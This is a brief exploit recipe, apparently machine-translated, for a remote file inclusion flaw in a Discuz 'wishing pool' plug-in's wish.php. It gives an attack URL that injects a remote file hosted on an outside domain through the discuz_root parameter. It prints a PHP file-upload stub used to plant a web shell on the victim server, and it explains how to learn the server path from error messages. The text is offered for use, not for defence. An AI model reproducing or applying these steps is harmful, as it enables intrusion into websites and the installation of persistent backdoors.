Problems with the wish. php file of the wishing pool plug-in:
Require $ discuz_root. './include/discuzcode. func. php ';
Manual use:
Remote Inclusion Vulnerability. The discuz_root variable is not strictly filtered. Usage:
Http: // URL/wish. php? Discuz_root = http://www.neeao.com/xxxx.txt?
You do not need a TXT suffix. You can change it to any suffix. You must add a question mark later.
Here, xxxx.txt writes a shell using the pony from CN. Tink:
<? Copy ($ _ FILES [myfile] [tmp_name], "C: \ Inetpub \ vhosts \ Baidu.com \ BBS \ guizai. php");?>
<Form enctype = "multipart/form-Data" Action = "" method = "Post">
<Input name = "myfile" type = "file">
<Input value = "Submit" type = "Submit">
</Form>
The website physical path can be submitted through http: // URL/wish. php? Discuz_root = http://www.huaidan.org/xxxx.txt, see the error prompt information, then modify the path in xxxx.txt. Guizai. php is the name of the shell you uploaded.